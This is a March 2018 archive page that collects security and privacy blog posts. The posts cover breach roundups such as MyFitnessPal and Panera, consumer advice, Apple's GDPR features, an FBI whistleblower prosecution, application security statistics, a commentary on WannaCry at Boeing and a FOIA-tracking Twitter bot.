Monthly Archives: March 2018

New Traffic Light Protocol (TLP) levels for 2018

The Traffic Light Protocol should be familiar to anyone working with sensitive data, with levels RED, AMBER, GREEN and WHITE being used to specify how far information can be shared. In recent years it has become clear that these four levels are not enough, so the United Nations International Committee on Responsible Naming (UN/ICoRN) has introduced nine new TLP levels for implementation from the

Privacy protections are needed for government overreach, too

After the unfortunate yet predictable Facebook episode involving Cambridge Analytica, several leaders in the technology industry were quick to pledge they would never allow that kind corporate misuse of user data.

The fine print in those pledges, of course, is the word ‘corporate,’ and it’s exposed a glaring weakness in the privacy protections that technology companies have brought to bear.

Last week at IBM Think 2018, Big Blue’s CEO Ginni Rometty stressed the importance of “data trust and responsibility” and called on not only technology companies but all enterprises to be better stewards of data. She was joined by IBM customers who echoed those remarks; for example, Lowell McAdam, chairman and CEO of Verizon Communications, said he didn’t ever want to be in the position that some Silicon Valley companies had found themselves following data misuse or exposures, lamenting that once users’ trust has been broken it can never be repaired.

Other companies piled on the Facebook controversy and played up their privacy protections for users. Speaking at a televised town hall event for MSNBC this week, Apple CEO Tim Cook called privacy “a human right” and criticized Facebook, saying he “wouldn’t be in this situation.” Apple followed Cook’s remarks by unveiling new privacy features related to European Union’s General Data Protection Regulation.

Those pledges and actions are important, but they ignore a critical threat to privacy: government overreach. The omission of that threat might be purposeful. Verizon, for example, found itself in the crosshairs of privacy advocates in 2013 following the publication of National Security Agency (NSA) documents leaked by Edward Snowden. Those documents revealed the telecom giant was delivering American citizens’ phone records to the NSA under a secret court order for bulk surveillance.

In addition, Apple has taken heat for its decision to remove VPN and encrypted messaging apps from its App Store in China following pressure from the Chinese government. And while Tim Cook’s company deserved recognition for defending encryption from the FBI’s “going dark” effort, it should be noted that Apple (along with Google, Microsoft and of course Facebook) supported the CLOUD Act, which was recently approved by Congress and has roiled privacy activists.

The misuse of private data at the hands of greedy or unethical corporations is a serious threat to users’ security, but it’s not the only predator in the forest. Users should demand strong privacy protections from all threats, including bulk surveillance and warrantless spying, and we shouldn’t allow companies to pay lip service to privacy rights only when the aggressor is a corporate entity.

Rometty made an important statement at IBM Think when she said she believes all companies will be judged by how well they protect their users’ data. That’s true, but there should be no exemptions for what they will protect that data from, and no denials about the dangers of government overreach.

The post Privacy protections are needed for government overreach, too appeared first on Security Bytes.

Weekly Cyber Risk Roundup: MyFitnessPal Breach, Carbanak Leader Arrested

Under Armor announced this week that approximately 150 million users of the diet and fitness app MyFitnessPal had their personal information acquired by an unauthorized third party sometime in February 2018. As Reuters noted, it is the largest data breach of 2018 in terms of the number of records affected.

The breach was discovered on March 25, and the data compromised includes usernames, email addresses, and hashed passwords — the majority of which used bcrypt, the company said.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users,” the company said in a statement. “Payment card data was not affected because it is collected and processed separately.”

MyFitnessPal also said that it would be requiring users to change their passwords and is urging users to do so immediately. The company is also urging users to review their accounts for suspicious activity as well as to change passwords on any other online accounts that used the same or a similar password to their now-breached MyFitnessPal credentials.

It is unclear how the unauthorized third party acquired the data, and the investigation is ongoing. Under Armour bought MyFitnessPal in February 2015 for $475 million.


Other trending cybercrime events from the week include:

  • Employee accounts targeted: The Retirement Advantage is notifying clients that their employees’ personal information may have been compromised due to unauthorized access to an employee email account at its Applied Plan Administrators division. Storemont in Northern Ireland is warning all staff of a cyber-attack targeting email accounts with numerous password attempts, and a number of accounts were compromised due to the attack. Shutterfly is notifying customers that their personal information may have been compromised due to an employee’s credentials being used without authorization to access its Workday test environment.
  • Payment card breaches: Manduka is notifying customers of a year-long payment card breach after discovering malware on its e-commerce web platform. Mintie Corporation is notifying customers of a ransomware attack that may have compromised customer payment card information. Fred Usinger said its hosting service provider notified the company of a breach involving personal information and stored payment information.
  • Other data breaches: A report from New York’s Attorney General said that 9.2 million New Yorkers had their data exposed in 2017, quadruple the number from 2016. Motherboard obtained thousands of user account details that are circulating on public image boards, and many of those accounts are related to a bestiality website. Mendes & Haney is notifying customers of unauthorized access to its network. Branton, de Jong and Associates is notifying customers that their tax information may have been compromised due to unauthorized access to its tax program. Researchers discovered a misconfigured database belonging to the New York internal medicine and cardiovascular health practice Cohen Bergman Klepper Romano Mds PC that exposed the patient information of 42,000 individuals.
  • Other notable events: Baltimore’s 911 dispatch system was temporarily shut down after a hack by an unknown actor led to “limited breach” of the system that supports the city’s 911 and 311 services. Kent NHS Trust is notifying patients that a staff member who had accessed their medical records “without a legitimate business reason” has been dismissed. The Malaysian central bank said it thwarted a cyber-attack that involved falsified wire-transfer requests over the SWIFT bank messaging network. Boeing said that a few machines were infected with the WannaCry malware.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Law enforcement officials in Spain have arrested the alleged leader of the cybercriminal syndicate behind the Carbankak and Cobalt malware attacks, which have targeted more than 100 financial organizations around the world and caused cumulative losses of over €1 billion since 2013.

Europol’s press release did not name the alleged mastermind behind the group; however, Bloomberg reported that Spain’s Interior Ministry named the suspect as Denis K, a Ukrainian national who had accumulated about 15,000 bitcoins (worth approximately $120 million at the time of his arrest). Europol noted that numerous other coders, mule networks, and money launderers connected to the group were also the target of the international law enforcement operation.

The group first used the Anunak malware in 2013 to target financial transfers and ATM networks, and by the following year they had created a more sophisticated version of the malware known as Carbanak, which was used by the group used until 2016. At that point the group carried out an even more sophisticated wave of attacks using custom-made malware based on the Cobalt Strike penetration testing software, Europol said.

“The criminals would send out to bank employees spear phishing emails with a malicious attachment impersonating legitimate companies,” Europol wrote in a press release. “Once downloaded, the malicious software allowed the criminals to remotely control the victims’ infected machines, giving them access to the internal banking network and infecting the servers controlling the ATMs. This provided them with the knowledge they needed to cash out the money.”

Carlos Yuste, a Spanish police chief inspector who helped lead the operation, told Bloomberg that “the head has been cut off” of the high-profile group. Steven Wilson, Head of Europol’s European Cybercrime Centre, said that the arrest illustrates how law enforcement “is having a major impact on top level cybercriminality.”

High Quality Problems – Paul’s Security Weekly #553

This week, Executive Director of Source Boston 2018 Rob Cheyne joins us for an interview! Paul delivers the Technical Segment this week entitled, Cutting The Cord: The Ideal Home Network Setup! In the Security News, we have updates from Apple macOS, Windows 7 Meltdown patch, Atlanta’s Ransomware attack, a special appearance in the Security News from Apollo Clark, and more on this episode of Paul’s Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

MyFitnessPal, Panera Bread, Saks Fifth Avenue: What to Know About the Recent Data Breaches

This blog has been updated as of 4/4.

Practically everything has become digitized in 2018. We’ve developed thousands of health apps and gadgets to help monitor our fitness, implemented online ordering services for restaurants, the list goes on. And just this past week – two of these very innovations have been breached for customer data, as well as two traditional brick-and-mortar sites. MyFitnessPal, Panera Bread, and Saks Fifth Avenue and Lord & Taylor have all been faced with data breaches, which have compromised millions of customers.

Let’s start with MyFitnessPal. Just last week, it was revealed that 150 million accounts for the health app and site were breached. As of now, few details have emerged about how the attack happened or what the intention was behind it. While the breach did not compromise financial data, large troves of other personal information were affected. The impacted information included usernames, email addresses, and hashed passwords.

MyFitnessPal, which is a subsidiary of Under Armour, has notified affected customers of the breach (see below), and Under Armour has released an official statement making the public aware of the attack as well.

Then there’s Panera Bread. The popular food chain actually leaked customer data on their website in plain text. This data includes names, email addresses, home addresses, birth dates and final four credit card digits. It’s not clear whether anyone malicious actually accessed any of this data yet, which was supplied by customers who had made online accounts for food delivery and other services. What’s more – a security researcher first flagged this error to Panera Bread eight months ago, which did not acknowledge it until just now. And though the initial number of impacted users was said to be fewer than 10,000 customers, security reporter Brian Krebs estimates that as many as 37 million Panera members may have been caught up in the breach.

Finally there’s Saks Fifth Avenue and Lord & Taylor. A group of cybercriminals has obtained more than five million credit and debit card numbers from customers of the two high-end clothing stores. It appears this data was stolen using software that was implanted into the cash register systems at brick-and-mortar stores and siphoned card numbers.

So, for the millions of affected MyFitnessPal, Panera Bread, and Saks and Lord & Taylor customers, the question is – what next? There are a few security steps these users should take immediately. Start by following these pointers below:

  • Change your password immediately. If you are a MyFitnessPal or Panera Bread customer, you should first and foremost change the password to your account. Then, you should also change your password for any other account on which you used the same or similar information used for your MyFitnessPal or Panera Bread account.
  • Stay vigilant. Another way cybercriminals can leverage stolen emails is by using the list for phishing email distribution. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided. Better to just delete the email entirely.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With these breaches, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.


The post MyFitnessPal, Panera Bread, Saks Fifth Avenue: What to Know About the Recent Data Breaches appeared first on McAfee Blogs.

Apple GDPR privacy protection will float everyone’s privacy boat

With less than two months before the European Union’s General Data Protection Regulation goes into effect, Apple is making notable changes in the name of user privacy. For everyone.

While all companies that collect data from EU data subjects will be subject to the GDPR, Apple has stepped up to announce that privacy, being a fundamental human right, should be available to everyone, including those outside the protection of the EU.

In a move that is raising hope for anyone concerned about data privacy, Apple GDPR protections will be offered to all Apple customers, not just the EU data subjects covered by the GDPR.

The new privacy features are part of Apple’s latest updates to its operating systems — macOS 10.13.4, iOS11.3 and tvOS 11.3 — released on Thursday. The most obvious change, for now, will be a new splash screen detailing Apple’s privacy policy as well as a new icon that will be displayed when an Apple feature wants to collect personal information.

More Apple GDPR support will come later this year when the web page for managing Apple ID accounts is updated to allow easier access to key privacy features mandated under the EU privacy protection regulation, including downloading a copy of all their personal data stored by Apple, correcting account information and temporarily deactivating or permanently deleting the account. The Apple GDPR features will roll out to the EU first after GDPR enforcement begins, but eventually they will be available to every Apple customer no matter where they are.

Apple GDPR protections for all

Speaking at a town-hall event sponsored by MSNBC the day before the big update release, Apple CEO Tim Cook stressed the company profits from the sale of hardware — not the sale of personal data collected on its customers. Cook also took a shot at Facebook for its latest troubles related to allowing improper use of personal data by Cambridge Analytica, saying that privacy is a fundamental human right — a sentiment also spelled out in the splash screen displayed by Apple’s new OS versions.

Anyone concerned about data privacy should welcome Apple’s move, but it may not be as easy for other companies to follow Apple’s lead on data privacy, even with the need to comply with GDPR.

The great thing about the Apple GDPR compliance for everyone move is that it shows the way for other companies: rather than attempting to maintain two different systems for privacy protections, companies can choose to raise the ethical bar for maintaining and supporting personal data privacy to the highest standard, set by the GDPR rules, or they can go to the effort and expense of complying with GDPR only to the extent necessary by law.

On the one hand there is the requirement for GDPR-compliance regarding EU data subjects, where consumers are granted the right to be forgotten and the right to be notified when their data has been compromised, among other rights. On the other hand, companies can choose to continue to collect and trade personal data of non-EU data subjects and evade consequences for privacy violations on those people by complying with the minimal protections required by the patchwork of less stringent legislation in effect in the rest of the world.

While a technology company like Apple can focus its efforts on selling hardware while protecting its customers’ data, it remains to be seen what the big internet companies — like Facebook, Google, Amazon and Twitter — will do.

Companies whose business models depend on the unfettered collection, use and sale of consumer data may opt to build a two-tier privacy model: more protection for EU residents under GDPR, and less protection for everyone else.

As a member of the “everyone else” group, I’d rather not be treated like a second-class citizen when it comes to privacy rights.

The post Apple GDPR privacy protection will float everyone’s privacy boat appeared first on Security Bytes.

The accused FBI whistleblower indicted by Trump’s DOJ allegedly leaked secret rules for spying on reporters

DOIG cover

The Trump Justice Department escalated its crackdown on journalists’ sources and whistleblowers this week, charging former FBI special agent Terry Albury with two counts under the Espionage Act for allegedly leaking information to an unnamed news outlet, widely believed to be The Intercept.

The case is yet another example of the outrageous—and recently, far too common—use of the World War I-era law, to persecute the sources of journalists for the crime of informing the American public. The fact that whistleblowers have been thrown in jail with increasing regularity using a law meant for spies should be an outright scandal. As First Look Media, The Intercept’s parent company, said through their Press Freedom Fund, “The misuse of the Espionage Act chills truth tellers, impedes investigative reporting, and compromises the democratic process.”

But it’s also important to understand what Mr. Albury is alleged to have leaked and how it makes him a true whistleblower. News reports indicate he is accused of providing The Intercept documents related to its “FBI’s Secret Rules” reporting project, an important series of articles that looks into how the FBI secretly conducts investigations.

Notably, the very first story The Intercept published in that series was about a document containing the FBI’s classified rules for specifically targeting journalists with National Security Letters (NSLs), the controversial and due process-free surveillance tool that the agency can serve on telecom companies like AT&T and Verizon to spy on journalists and root out their sources.

The Justice Department’s strict rules for when they can and can’t conduct surveillance of journalists are supposed to governed by the agency’s “media guidelines,” which the Obama administration updated and strengthened after several embarrassing scandals when the Obama-era Justice Department was caught surveilling journalists. But critically, NSLs are completely exempt from those rules.

Instead, the rules for using NSLs against journalists are in the classified appendix of the FBI’s “Domestic Investigations and Operations Guide” (DIOG), under the heading “National Security Letters for Telephone Toll Records of Members of the News Media or Media Organizations.” The secret rules allow the Justice Department to use NSLs with virtually none of the restrictions or safeguards that are in place if they attempted to get a subpoena or court order for a journalist’s private telephone toll records. You can see the leaked version of the rules from here:

Along with Knight First Amendment Institute at Columbia, we are currently suing the Justice Department under the Freedom of Information Act for the current versions of these documents.

But as you can see from the leaked 2013 version, it’s absurd these rules were ever classified in the first place. There’s nothing “damaging” to national security for the public to know the FBI’s “approval requirements” consist of merely getting an additional sign off from a superior to target a journalist with an NSL. It’s clear from looking at the document that the classification system is being abused to cover up embarrassing and controversial practices which have no business being stamped secret.

Instead, it’s likely that the government wants these rules kept secret so that the FBI can continue to circumvent the DOJ media guidelines and spy on journalists in secret, without facing any public scrutiny of the practice.

The prosecution of Mr. Albury is outrageous, but if he was The Intercept’s source, then he exposed the government’s secret powers to spy on news organizations with no oversight. For that, he should be viewed by journalists as a hero.

Disclosure: First Look Media, The Intercept’s parent company, provides Freedom of the Press Foundation with an annual grant and three employees of First Look, Glenn Greenwald, Laura Poitras, and Micah Lee, sit on FPF’s board. They were not consulted in the drafting of this blog post.

How the Rubber Meets the Road in Human-Machine Teaming

Everywhere you turn today, machine learning and artificial intelligence are being hyped as both a menace to and the savior of the human race. This is perhaps especially true in cybersecurity.

What these alluring terms usually mean is simply related to detailed statistical comparisons derived from massive data collections. Let’s look at the terms themselves:

  • Machine Learning describes algorithms that can statistically compare patterns and similarities in a set of data and provide useful information without being explicitly programmed to do so.
  • Artificial Intelligence describes programs that go a step further, taking the useful information from machine learning and applying it directly to a pain area to mimic reason and problem-solving and make decisions automatically.
  • Human-Machine Teaming, which our CTO Steve Grobman urges for cybersecurity, describes increasing the number of important security things we can do without explicitly thinking about them or acting on them to such an extent that it frees people to perform strategic analysis and problem-solving.

At McAfee we are urging our customers to take a long and comprehensive view of human-machine teaming that looks beyond the current, cool-factor buzz. You can make it real, make it practical, and make it scalable, but what does that look like? I recently gave an analogy that can help business people understand this topic in a white paper called “Driving Toward a Better Understanding of Machine Learning.” You can download it here.

As a metaphor representing malware threats, I introduced the concept of malicious autonomous cars: self-driving cars that have been programmed to do bad things. For example, posing as taxis, malicious autonomous cars could trick and kidnap people. (Much the way ransomware could masquerade as an email attachment, then “kidnap” your critical user files, and demand payment.)

The machines are learning, and to stay secure we must learn as well. Let’s do it together.

The post How the Rubber Meets the Road in Human-Machine Teaming appeared first on McAfee Blogs.

State of Software Security: Checking the Pulse of the Healthcare Industry

Over the past year, our scans of thousands of applications and billions of lines of code found a widespread weakness in applications, which is a top target of cyber attackers. And when you zoom in from a big picture view down to a micro-level, there are a few industries that are struggling to keep up with the rapidly changing cybersecurity landscape and combat the tactics of malicious actors today. 

One of these sectors is healthcare. Healthcare organizations hold some of the most sensitive personal data, yet they have been victims of several high-profile breaches in recent years. In 2017 alone, healthcare data breaches increased, with one breach impacting more than one million individuals, and 14 breaches of more than 100,000 records. According to the CA Veracode 2017 State of Software Security report (SOSS), which includes scan data collected from our own platform over the past year, healthcare organizations made security strides, increasing OWASP policy compliance by an average nine percent between an application’s first and last scan. But healthcare applications had a high prevalence of flaws in the information leakage (55 percent) and cryptographic issues (52 percent) categories.

The Raw State of Untested Software

In theory, the growing awareness of security within the developer community should be prodding the overall body of coders to improve their daily programming best practices. Unfortunately, the stats don’t reflect this. We saw OWASP pass rates, for example, drop by about eight percentage points from last year. However, this may be related to the new companies added to the scan, including healthcare, hospitality and retail apps being scanned for the first time this year.

On the bright side, OWASP pass rates have improved by a statistically significant number compared to our initial data in 2010. And when organizations first scan their applications for vulnerabilities, they’re bound to find flaws. Still, we hope that our research into vulnerability prevalence would show a little bit of improvement on the raw state of software before security testing. If you’re looking for a silver lining, note that the lowest performing industries (healthcare and government) in last year’s SOSS study experienced the smallest declines in pass rate year-over year. That silver lining becomes a mere sliver when you look at the percentage of applications affected and the top three vulnerabilities in the healthcare industry, which includes information leakage (55.2 percent), cryptographic issues (51.5 percent) and code quality (35.1 percent).

And this year, we also took a peek at how many applications within an industry were undergoing their first policy scan as compared to the rest of the portfolio under current testing. A higher percentage of new applications undergoing their first policy can, such as healthcare, tends to suggest that those organizations are just getting started with their application security maturity process.

Meanwhile, healthcare among other industries on-boarded the most applications relative to the size of their portfolios. This could go a long way toward explaining their good performance in remediation from first scan to latest scan. With so many new applications added, these industries likely were able to take care of a lot of low-hanging fruit, namely easy-to-fix flaws that were newly found.

How to Scale Up Security Success

The good news is that it’s not all doom and gloom. For instance, the latest SOSS report highlights manufacturing and aerospace organizations have already made security part of their software development process. As a result, they have the highest OWASP pass rate on latest scan (30.5 percent) of any industry grouping, and the lowest proportion of applications undergoing their first assessment (nearly 40 percent). It goes to show that if you stick with a solid security program, improve security through testing and give your developers the resources they need for testing and remediation, then all industries will be able to improve their application security posture — including healthcare.

Our research shows that organizations that do testing and remediation are prioritizing the worst vulnerabilities, reducing flaw density on very high and high severity flaws at twice the clip of the overall field of vulnerabilities. Nevertheless, only 14 percent of the most severe flaws are fixed in under a month, and nearly 12 percent of applications have at least one high or very high severity flaw.

The latest SOSS report lets us think long and hard about where we need to go in order to achieve AppSec maturity. And while it seems like we are moving the application security needle slowly, there is a bright light at the end of the tunnel. With the right program in place, all industries can improve the state of software security. Looking to improve AppSec in your organization? Consider testing early and often, give developers the resources they need, and fix what you can, starting with the bugs that matter the most.


WannaCry after one year

In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago.

It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, have whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry.

Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit).

Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug in an unpatched computer onto the raw Internet, without the benefit of a firewall, it'll get infected within an hour.

However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories imply some nefarious hacker activity that "targeted" Boeing, but that's unlikely.

We have now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop.

Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading.

Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are largely disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of killswitch means the virus will continue to run, attacking more systems instead of immediately killing itself.

One solution to this would be to setup sinkhole DNS servers on the network that resolve all unknown DNS queries to a single server that logs all requests. This is trivially setup with most DNS servers. The logs will quickly identify problems on the network, as well as any hacker or virus activity. The side effect is that it would make this killswitch kill WannaCry. WannaCry isn't sufficient reason to setup sinkhole servers, of course, but it's something I've found generally useful in the past.


Something obviously happened to the Boeing plant, but the narrative is all wrong. Words like "targeted attack" imply things that likely didn't happen. Facts are so loose in cybersecurity that it may not have even been WannaCry.

The real story is that the original WannaCry is still out there, still trying to spread. Simply put a computer on the raw Internet (without a firewall) and you'll get attacked. That, somehow, isn't news. Instead, what's news is whenever that continued infection hits somewhere famous, like Boeing, even though (as Boeing claims) it had no important effect.

Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times

The amount we use our apps and the amount of apps we use has shown no signs of slowing. And as the McAfee Labs Threats Report: March 2018 tells us, mobile malware has shown no signs of slowing either. Now, a tricky Android malware dubbbed Andr/HiddnAd-AJ is adding to the plethora of mobile strains out there. The malware managed to sneak onto the Google Play Store disguised as seven different apps – which have collectively been downloaded over 500,000 times.

Slipping onto the Google Play store via six QR reader apps and one smart compass app, the malware manages to sneak past security checks through a combination of unique code and no initial malicious activity. Following installation, Andr/HiddnAd-AJ waits for six hours before it serves up adware. When it does, it floods a user’s screen with full-screen ads, opens ads on web pages, and sends various notifications containing ad-related links, all with the goal of generating click-based revenue for the attackers.

These apps have since been taken down by Google, however, it’s still crucial that Android users are on the lookout for Andr/HiddnAd-AJ malware and other adware schemes like it. Start by following these security tips:

  • Do your homework. Before you download an app, make sure you head to the reviews section of an app store first. Be sure to thoroughly sift through the reviews and read through the comments section; Andr/HiddnAd-AJ may have been avoided if a user read one of the comments and saw that the app was full of unnecessary advertisements. When in doubt, don’t download any app that is remotely questionable.
  • Limit the amount of apps. Only install apps you think you need and will use regularly. And if you no longer use an app, uninstall it. This will help you save memory and reduce your exposure to threats such as Andr/HiddnAd-AJ.
  • Don’t click. This may go without saying, but since this is a click-generated revenue scheme, do whatever you can to avoid clicking pop-ups and unwarranted advertisements. The less you click, the less cybercriminals will profit.
  • Use a mobile security solution. As malware and adware campaigns continue to infect mobile applications, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times appeared first on McAfee Blogs.

The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day

At one point in my career, I was responsible for launching massive websites.  We’d talk about when and how we flip the switch to launch the new website.  At least once during every project someone would ask me who got to flip the switch, as though we would have a dignitary (or them?) do it.  But depending on the year, the flipping on of a website was handled through technology and not very dramatic and not with the fanfare the non-technologists hoped for. (Dimming lights? Fireworks?  It was New York and it was publishing, so there was often beer and wine and maybe T-shirts after, but everyone went home and slept.)

And now we have May 25th coming around the corner. The other day, I got a picture in a text from a colleague of a can of sardines.  It took me a minute to realize the expiration was May 25.  So, other than the sardines, what happens?  Are we done?

First the bad news:  We won’t ever be done.  GDPR requires constant diligence for its principles, recurring reviews of the processes we’ve built; ongoing use of Data Processing Impact Assessments; vigilance on how we process, store, transfer, use personal data; communications with our customers; new contractual language and new things to negotiate; ongoing discussions around security and what is appropriate.  And of course, the biggest question: What will the data regulators do?  Will there be an immediate fine? (My bet is no.)

But now the good news: If you’ve been doing this right and have managed to focus on the concepts of Great Data Protection Rocks and a culture of security, the following things may have happened:

  • You have a much better idea of what data you have, where it is stored, who can get to it, and how it gets used. Hopefully you have deleted some data and have additional automated processes to delete data when it ceases to be needed.
  • You have processes in place to replace things that were being done on the fly. Maybe there’s some documentation and someone officially designated to help with the processes.
  • You know who your vendors are, and more about your high-risk and cloud vendors.
  • You have determined what needs securing and made sure you are securing it “appropriately.”
  • You’ve got a team of people who understand data protection and GDPR – maybe some new friends and some new project partners. A few of them may not have bought in completely (the people who were “voluntold” to help), but just wait.  Something often  seems to happen in the doubter’s personal life that makes them get it – and big time.  Real examples:  Mortgage application reveals massive identity theft that needs to be fixed or they lose the house; soccer coach sends kid’s medical condition info to the whole team’s parents; intern (not at McAfee!) sends spreadsheet of fraternity members’ contact info, but it also contained everyone’s grade-point average.

Perhaps most importantly, your company now has momentum around doing the right thing regarding data protection.  And May 25th will come – too soon, not soon enough, or both! – and the lights won’t dim but there might be T-shirts.

It would be easy to forget GDPR’s lessons. In the United States, Monday, May 28th, is Memorial Day, and we pull out summer clothes, take off to mark the start of summer, and remember our heroes.  But on that Monday and Tuesday and every day after, Great Data Protection will still Rock, and we will still need to look at data, how it’s used, and how our culture can protect it. Just maybe throw out the sardines if they don’t get eaten beforehand (or leave them on the doubter’s desk as a joke).

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day appeared first on McAfee Blogs.

Introducing @FOIAFeed, a Twitter bot that finds and shares Freedom of Information Act journalism

Not that kind of records

Freedom of the Press Foundation is launching @FOIAFeed today, a new project that aims to automatically find and surface reporting that uses the Freedom of Information Act or other public records laws to obtain source material.

@FOIAFeed is a Twitter bot that reads stories as they are published from over a dozen major news organizations, and posts links and excerpts to Twitter whenever it finds a relevant article. In our experience so far, the bot turns up new and important stories nearly every day. You can follow @FOIAFeed here.

There’s no doubt that the FOIA process is cumbersome, and in some ways, badly broken. But investigative journalism that digs into primary source documents obtained through public records laws is interesting and substantial work, and we like to shine a spotlight on that reporting.

@FOIAFeed's results show that public records laws enable that kind of investigation across a broad cross-section of subjects. In just the last few days, it has posted stories about the political rise of certain career officials in the Trump administration, links between campaign contributions and sting operations against men who patronize sex workers, and apparent age discrimination among employees at tech giant IBM.

Public records as a through-line between this diverse array of stories may not be obvious, but we hope that people interested in the mechanics of journalism will get some value out of seeing these stories compiled together.

Beyond that, we have two major goals for the @FOIAFeed project. One is to inspire journalists to see what their peers are doing with public records laws, and to hopefully find ways to push the envelope even further. We've heard from journalists that the world of FOIA requests can seem insular and intimidating, not least because of inadequacies in the law. Requests get ignored, while others take years and come back almost completely censored, like this recent Miami Herald story that was just picked up by @FOIAFeed:

Despite its flaws, FOIA can produce powerful results. We hope that a steady stream of examples can help reduce the threshold for journalists to dive in (or even for FOIA pros to pick up new ideas).

A second goal is to underscore the importance of public records laws in investigative reporting. Highlighting the tools that journalists use to report their stories can help advocates for those tools, both when there is opportunity to expand and improve them (as with the FOIA Improvement Act of 2016, for example) or when there is a need to defend them (as with the recent "cyber-security" exemption added to Michigan's public records law, or the successful push to prevent a gutting of the Washington Public Records Act).

Currently, @FOIAFeed is monitoring news stories from the Associated Press, Reuters, the Los Angeles Times, the New York Times, Buzzfeed News, the Washington Post, the Chicago Tribune, the Miami Herald, CNN, Gizmodo, ProPublica, The Intercept, and the Marshall Project. It relies on RSS feeds from those organizations, and we plan to expand in the coming days to cover more outlets that engage in public records reporting and offer such feeds.

Additionally, we will soon be releasing the underlying source code that powers @FOIAFeed, and we hope it will be useful to other potential bot developers. Our bot focuses on public records laws, but as we develop and generalize it, we think it could be used as a broader public news alert system on any topic you’d like.

Why I’m Going to RSA 2018: CA Veracode’s New SVP of Engineering

RSAC 2018

Paiman Nodoushan has been working at CA Veracode for about two months. In that time, he's met a lot of his peers and claims he already remembers over 50% of their names, no small feat. Jokes aside, he's been getting to know his team, our projects, and the ins and outs of our entire SaaS operation. In our quick interview, he describes the team at Veracode as hard working and passionate, and goes on to point out that:

"One thing that I don't think people actually realize is how difficult it is to build a whole SaaS operation. From pre-sales through sales, to engineering, product management, and to post-sales, connecting to all the backend systems that exist - it takes years for companies to go and build that."

We're lucky our Founders had the foresight to keep us focused on a SaaS model in our earliest days, and that we have a leader like Paiman joining us to help drive further improvements in those operations. Paiman is headed to the RSA Conference with many others from the CA Technologies and Veracode teams; this will be his first RSA Conference ever.

Why Attend RSA?

Paiman lists three things he's looking to accomplish at the RSA Conference this year:

  1. Meeting Customers
  2. Hearing from Competition
  3. Learning

Be sure to catch Paiman at the CA Veracode booth this year and watch the full interview below to get to know him some more.

Kick Off Your Digital Spring Cleaning Efforts During World Backup Day

